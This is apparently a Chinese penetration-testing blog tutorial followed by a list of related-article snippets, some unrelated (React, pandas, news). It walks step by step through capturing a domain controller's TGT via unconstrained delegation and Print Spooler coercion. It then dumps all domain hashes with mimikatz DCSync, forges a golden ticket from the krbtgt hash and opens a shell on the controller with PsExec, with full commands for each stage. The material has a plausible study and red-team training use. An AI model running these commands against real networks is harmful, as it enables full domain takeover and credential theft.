利用非约束性委派+Spooler打印机服务 制作黄金票据攻击域控
目录
前言
攻击过程
Rubeus监听
利用打印服务强制让域控机向本机验证身份
提取TGT
注入TGT票据到当前会话并导出域控中所有用户的hash
制作黄金票据
前言
继上一篇 ——> 域渗透—委派攻击之非约束委派攻击原理及利用。在实战中,只是单纯的非约束委派话需要管理员主动连接比较鸡肋。因此可以利用非约束委派 + Spooler打印机服务可以强制指定的主机进行连接。
利用原理:利用Windows打印系统远程协议 (MS-RPRN)
中的一种旧的但是默认启用的方法,在该方法中,域用户可以使用MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex)
方法强制任何运行了 Spooler 服务的计算机以通过Kerberos或NTLM对攻击者选择的目标进行身份验证
注:splooer服务是默认运行的
攻击过程
- 域:test.lab
- 域控:192.168.10.2 win2012,账号 administrator,主机名DC
- 域内主机:192.168.10.5 win7 ,账号 yuwin7,主机名admin-PC
攻击者控制一个开启了非约束委派的主机账户,当域控开启Print Spooler服务时,攻击者可以主动要求域控访问该主机服务器,进而获取DC的TGT
- 拿下一个具有Kerberos非约束委派的主机(主机账户)
- 找到一台运行Print Spooler服务(默认为自启而且为System权限)的DC
- 管理员身份使用Rubeus的监听模式
Rubeus监听
win7以本地管理员运行Rubeus
Rubeus.exe monitor /interval:1 /filteruser:DC$
# 我们可以用Rubeus来监听Event ID为4624事件,这样可以第一时间截取到域控的TGT
# /interval:1 设置监听间隔1秒
# /filteruser 监听对象为我们的域控,注意后面有个$,如果不设置监听对象就监听所有的TGT
# DC$为域控的主机名字加$
利用打印服务强制让域控机向本机验证身份
下载spoolsample.exe,此程序运行需要.net4。win7以当前域用户身份运行。注意win7需要关闭防火墙,不然接收不了ticket
spoolsample.exe DC admin-PC
# 表示利用打印服务强制让域控机向admin-PC主机验证身份,这样我们的Rubeus就可以监听到TGS了
此时Rubeus已经接收到了TGT
提取TGT
我们先复制Rubeus监听到的TGT的base64,这里每行都加了换行,我们用这个python脚本去掉每行的换行符
data=""
for line in open('1.txt','r'):data += line.strip('\n')
print(data)
with open("2.txt",'a') as f:f.write(data)
print('保存完毕')
然后直接用powershell
转到为正常的TGT
即可
[IO.File]::WriteAllBytes("绝对路径\ticket.kirbi", [Convert]::FromBase64String("TGT"))
注入TGT票据到当前会话并导出域控中所有用户的hash
mimikatz以域用户身份运行
kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:test.lab /all /csv
这儿请注意,我们这儿获得的TGT票据,不能算黄金票据,因为我们获得的权限只是域控的本地管理权限,所以不能连接域控,但是我们确可以因此获取所以用户的hash,所以能制作真正的黄金票据~
制作黄金票据
既然存在krbtgt用户,并且有该用户的hash或者NTML值,可以用它生成黄金票据
1. 获取本账号的sid
现在本机执行 whoami /user,注意不需要后面表示账号权限的几位数
2. 制作票据
mimikatz "kerberos::golden /domain:test.lab /sid:S-1-5-21-587556175-550635965-2643831430 /krbtgt:6412c19ffa5a50cd63fe27917ef83f54 /user:administrator /ticket:ntlm.kirbi" "exit"
3. 注入票据
mimikatz "kerberos::purge" "kerberos::ptt ntlm.kirbi"
此时已经可以连接域控了
我们还可以直接用psexec
反弹shell
,因为注入了黄金票据,所以不需要用户名和密码
PsExec64.exe \\dc cmd -accepteula
利用非约束性委派+Spooler打印机服务 制作黄金票据攻击域控相关推荐
- Kerberos 域委派攻击之非约束性委派
CSDN文章自动迁移自博客 在Windows 2000 Server 首次发布 Active Directory 时,Microsoft 必须提供一种简单的机制来支持用户通过 Kerberos 向 W ...
- 基于windows中委派的攻击思路(上)-约束性委派与非约束性委派
文章目录 1. 前言 2. 发现具有委派关系的用户和计算机 2.1 原理 2.2 利用工具查找 1. ADFind 1.查询非约束委派的主机: 2.查询约束委派的主机 2. ldapsearch 1. ...
- 基于windows中委派的攻击思路(下)-基于资源的约束性委派
文章目录 1. 前言 2. 技术点 2.1 利用原理: 那么如何获得一个机器账户呢? 如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity? 3. 利 ...
- Kerberos 域委派攻击之约束性委派
CSDN自动博客文章迁移 由于非约束性委派的不安全性,微软在 Windows Server 2003 中引入了约束委派.区别在于不会直接把 TGT 给服务,所发送的认证信息中包含了允许访问的服务,即不 ...
- 互联网日报 | 茅台市值突破2万亿;新浪收到非约束性私有化要约;OPPO参与英国首个5G SA网络建设...
今日看点 ✦ 新浪收到初步非约束性私有化要约,CEO控股公司提议私有化 ✦ 贵州茅台股价再创历史新高,总市值突破2万亿元 ✦ OPPO宣布与沃达丰和爱立信合作,参与英国首个5G SA网络建设 ✦ 小电 ...
- React学习:双向数据绑定、约束性和非约束性组件-学习笔记
文章目录 React学习:双向数据绑定.约束性和非约束性组件-学习笔记 表单 约束性和非约束性组件(受限/非受限) 双向数据绑定小例子 React学习:双向数据绑定.约束性和非约束性组件-学习笔记 表 ...
- 域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案)...
0x01 前言 mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器.下载链接如下https://github.com/gentilkiwi/mimikatz/relea ...
- 【内网安全】横向移动非约束委派约束委派资源约束委派数据库攻防
文章目录 章节点 redteam.red 靶场 委派攻击分类: 关于约束委派与非约束委派 横向移动-原理利用-约束委派&非约束委派 非约束委派 复现配置 如何利用? klist purge 与 ...
- 域控-笔记三(非约束委派攻击,约束委派攻击)
文章目录 一. 域委派 1.1 域委派分类 1.2 使用委派条件 1.3 非约束委派原理 1.4 非约束委派流程 1.5 约束委派原理 1.6 约束委派流程 二. 委派攻击 2.1 非约束委派攻击 本 ...
最新文章
- matlab超出矩阵索引维度_搜你想看“头条搜索”网页版上线 搜索引擎迎来新玩家...
- 杂项-QRCode:ZXing
- GCPC2017 题解
- 过滤器 拦截器 区别
- 正确地kill java历程
- sysctl.conf文件详解
- Mybatis resultMap空值映射问题解决
- 分式混合运算20道题_FAG剖分式调心滚子轴承的性能
- Xcode增加头文件搜索路径的方法
- YYYY-mm-dd HH:MM:SS 备忘录
- bigdecimal js 判断等于0_Js BigDecimal实现精确加减乘除运算的方法
- switchHosts下载
- android 监听软键盘在页面的展开和隐藏
- win10资源管理器如何添加PDF文件预览
- Pandas实战-Series的方法
- pca人脸特征降维的过程理解及matlab编程实现
- html5的div是什么意思,div是什么意思?
- 图神经网络系列(一)介绍及基本模型
- 使用Openssl签发SSL证书
- GZHU18级寒假训练:Aquarius's Trial F